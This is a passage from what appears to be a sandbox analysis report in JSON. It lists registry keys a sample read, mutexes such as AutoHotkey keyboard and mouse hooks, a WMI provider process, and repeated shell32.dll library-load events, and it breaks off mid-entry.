        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\DefinitionFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\1252",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en-US",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids\\en",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\AppID",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\\ProxyStubClsid32\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{423EC01E-2E35-11D2-B604-00104B703EFD}\\ProxyStubClsid32\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{00020430-0000-0000-C000-000000000046}\\2.0\\0\\win64\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\ActivateOnHostFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\InprocServer32",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\ThreadingModel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryAdapterName",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DisableAdapterDomainName",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseDomainNameDevolution",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UseDomainNameDevolution",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DomainNameDevolutionLevel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\PrioritizeRecordData",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\PrioritizeRecordData",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AllowUnqualifiedQuery",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\AllowUnqualifiedQuery",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AppendToMultiLabelName",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenBadTlds",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenUnreachableServers",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ScreenDefaultServers",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DynamicServerQueryOrder",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\FilterClusterIp",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\WaitForNameErrorOnAll",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseEdns",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsSecureNameQueryFallback",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableDAForAllNetworks",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessQueryOrder",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\QueryIpMatching",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationTtl",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationTTL",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationRefreshInterval",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DefaultRegistrationRefreshInterval",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationMaxAddressCount",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\MaxNumberOfAddressesToRegister",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateSecurityLevel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\UpdateSecurityLevel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateTopLevelDomainZones",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DowncaseSpnCauseApiOwnerIsTooLazy",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationOverwrite",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheSize",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheTtl",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxNegativeCacheTtl",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AdapterTimeoutLimit",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ServerPriorityTimeLimit",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCachedSockets",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableServerUnreachability",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMulticast",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastResponderFlags",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderFlags",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderMaxTimeout",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMDNS",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsTest",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseCompartments",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\CacheAllCompartments",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseNewRegistration",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistration",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistrationOnly",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\NewDhcpSrvRegistration",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessPreferLocal",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableIdnEncoding",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableIdnMapping",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShortnameProxyDefault",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableNRPTForAdapterRegistration",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutHistoryLength",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutRecalculationInterval",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQueryTimeouts",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQueryTimeouts",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQuickQueryTimeouts",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQuickQueryTimeouts",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextLockCount",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\SCHANNEL\\UserContextListCount",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.37!7\\Name",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-100",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.10.3.42!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\wuaueng.dll,-400",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.80.1!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name",
        "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagLevel",
        "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\crypt32\\DiagMatchAnyMask",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableSerialChain",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\CryptnetPreFetchTriggerPeriodSeconds",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\MaxUrlRetrievalByteCount",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\DisallowedCertSyncDeltaTime",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlags",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\DisableAutoFlushProcessNameList",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushFirstDeltaSeconds",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\AutoFlushNextDeltaSeconds",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\108FBF794E18EC5347A414E4370CC4506C297AB2",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates\\932BED339AA69212C89375B79304B475490B89A0",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRulesLogDir",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRules",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesLastSyncTime",
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesEncodedCtl"
      ],
      "write_keys": [],
      "delete_keys": [],
      "executed_commands": [
        "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
      ],
      "resolved_apis": [
        "ntdll.dll.RtlWow64GetCurrentMachine",
        "ntdll.dll.RtlWow64IsWowGuestMachineSupported"
      ],
      "mutexes": [
        "Local\\SM0:3308:304:WilStaging_02",
        "AHK Keybd",
        "AHK Mouse"
      ],
      "created_services": [],
      "started_services": []
    },
    "enhanced": [
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,291",
        "eid": 1,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,291",
        "eid": 2,
        "data": {
          "file": "C:\\Windows\\System32\\rsaenh.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffedfb90000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:28,400",
        "eid": 3,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,697",
        "eid": 4,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,697",
        "eid": 5,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,697",
        "eid": 6,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,697",
        "eid": 7,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,713",
        "eid": 8,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,744",
        "eid": 9,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,744",
        "eid": 10,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,760",
        "eid": 11,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,775",
        "eid": 12,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,791",
        "eid": 13,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,806",
        "eid": 14,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,822",
        "eid": 15,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,838",
        "eid": 16,
        "data": {
          "file": "shell32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2330000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:35,853",
        "eid": 17,
        "data": {
          "file": "shell32.dll",
